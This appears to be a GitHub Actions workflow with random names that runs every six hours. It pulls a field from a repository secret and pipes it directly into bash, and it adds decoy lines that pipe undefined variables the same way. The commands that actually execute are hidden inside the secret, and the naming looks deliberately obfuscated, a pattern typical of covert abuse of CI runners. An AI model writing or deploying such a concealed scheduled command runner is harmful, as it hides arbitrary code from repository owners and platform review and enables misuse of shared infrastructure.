name: oiuajfnak

on:
  workflow_dispatch:
  schedule:
    - cron: '36 1/6 * * *'

jobs:  # 3453
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: oiuajfnak
        env:
          n8: ${{ secrets.n8 }}
        run: |
          echo $n8 | jq -r .megv23 | /bin/bash
          echo $j211 | jq -r .tsbvb4735 | /bin/bash
          echo $lrzef43107 | jq -r .hicna39 | /bin/bash
          echo $obtxu80 | jq -r .zz7 | /bin/bash
          echo $ugne118 | jq -r .auy85 | /bin/bash
          echo $acxeb73988 | jq -r .lodr13677 | /bin/bash
          echo $vjuh55814 | jq -r .bvp8917 | /bin/bash

